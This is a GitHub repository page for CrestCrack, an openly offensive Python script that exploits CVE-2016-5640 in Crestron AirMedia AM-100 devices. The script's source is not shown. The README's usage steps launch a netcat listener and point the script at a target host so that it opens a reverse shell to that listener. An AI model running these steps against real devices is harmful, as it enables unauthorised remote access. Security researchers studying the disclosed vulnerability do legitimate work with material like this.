Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes
.gitignore
LICENSE.md
README.md
crestcrack.py

README.md

Supported Python versions

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.

Setup:

  1. Clone a copy of CrestCrack git clone https://github.com/vpnguy/CrestCrack
  2. Launch a netcat listener nc -lvp 1337
  3. Execute CrestCrack against your target with your listener info ./crestcrack.py https://targethost 255.255.255.255 1337
  4. ??????
  5. PROFIT

###Usage: ./crescrack.py [target host] [listener IP] [listener port]

###Example: ./crescrack.py https://targethost 123.123.123.123 3311

Additional Vulnerability Information:

Cylance Vulnerability Disclosure

NIST CVE-2016-5640

To be added:

  • Error handling/bounds checking
  • Enhanced argument support
  • --help output